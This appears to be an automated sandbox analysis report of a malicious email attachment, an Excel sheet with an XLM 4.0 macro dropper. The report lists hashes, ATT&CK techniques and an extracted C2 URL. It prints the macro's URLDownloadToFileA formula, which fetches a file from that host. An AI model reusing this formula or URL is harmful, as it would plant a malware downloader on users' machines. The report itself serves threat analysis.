General

  • Target

    message__B1F416F39D94659FBC75B63C8DBB85084453114A_unknown_.eml

  • Size

    19KB

  • Sample

    210305-8gpx9ymckj

  • MD5

    542b0d9ad4364dbfba25e1231f713b00

  • SHA1

    c4872e70d14d270a62abdc03f32759c73f4ff107

  • SHA256

    5a567d8a0d5aac4ed14b29827109754543d099a2d95b97e2173ceccf87d5f6b7

  • SHA512

    53a59387173ad6a8dc36d7b6ad7f5c4aebf5c37d0b4af3a17f9e0d19254959f77d59fa50e0a49c4c7f363e1ba67ae235aa6ed2efd1a22b92607559929b50e459

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://dzw10jpcgj03fckc.com/inda.xls

Attributes
  • formulas

    =CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://dzw10jpcgj03fckc.com/inda.xls","..\fkruf.djr",0)

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://dzw10jpcgj03fckc.com/inda.xls

Targets

    • Target

      document-386407988.xls

    • Size

      39KB

    • MD5

      1fa4dc11ca13bb6b0007697ea948d103

    • SHA1

      34490a498d48b0aa3a8714811f72359f1e68b633

    • SHA256

      d90f43e55fea4004620ef90b8a8440493e23e4035b208afaaff7262453217903

    • SHA512

      0852782c9db46fff15a6a5c82f29f79d49593ae0109109aa3d0e186ab1a3c7ab0e440a4803b847bd36c75132a71fe0ceb9332aac0d8ba2e6c1bd2b65356bdf87

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Tasks